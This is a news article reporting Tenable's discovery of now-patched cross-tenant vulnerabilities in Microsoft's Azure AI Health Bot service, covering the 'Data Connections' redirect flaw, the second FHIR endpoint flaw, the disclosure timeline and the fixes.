Microsoft has resolved several vulnerabilities in the Azure AI Health Bot service that posed the risk of unauthorized access across different customer accounts. Detected by Tenable Research, these loopholes highlighted serious security weaknesses within chatbot systems.
Mechanism of Exploitation
The Azure AI Health Bot, popular among healthcare providers for virtual health assistant services, had issues in its “Data Connections” feature. Malicious actors could exploit these flaws by connecting bots with harmful external hosts. The external interaction could expose access tokens by redirecting responses, allowing intruders to bypass security measures and access internal Azure endpoints, including Azure's Internal Metadata Service (IMDS).
With the healthcare industry increasingly adopting AI tools, security lapses represent a significant threat due to the sensitive nature of health data. These identified vulnerabilities underscore the need for stringent security protocols in AI-driven services. To tackle these concerns, significant investments like the $50 million from the Advanced Research Projects Agency for Health (ARPA-H) aim to boost cybersecurity through automation. Healthcare providers and device manufacturers are urged to enhance their collaboration to safeguard medical data and devices.
Response and Fixes
Jimi Sebree, a senior engineer at Tenable, noted that the potential risk varied based on the information users exposed through the service. The issues circumvented safeguards meant to prevent cross-tenant access, revealing the challenges faced in rapid AI development. Upon discovering these security flaws, Tenable notified Microsoft's Security Response Center (MSRC) on June 17, 2024. Microsoft promptly verified the report and executed fixes by July 2, 2024.
Following the initial repairs, Tenable found another vulnerability related to the service's FHIR endpoints, which Microsoft also addressed. The second flaw did not allow cross-tenant access. So far, there is no evidence to suggest these vulnerabilities were used by malicious entities. Detailed information can be accessed through Tenable's research advisories TRA-2024-27 and TRA-2024-28.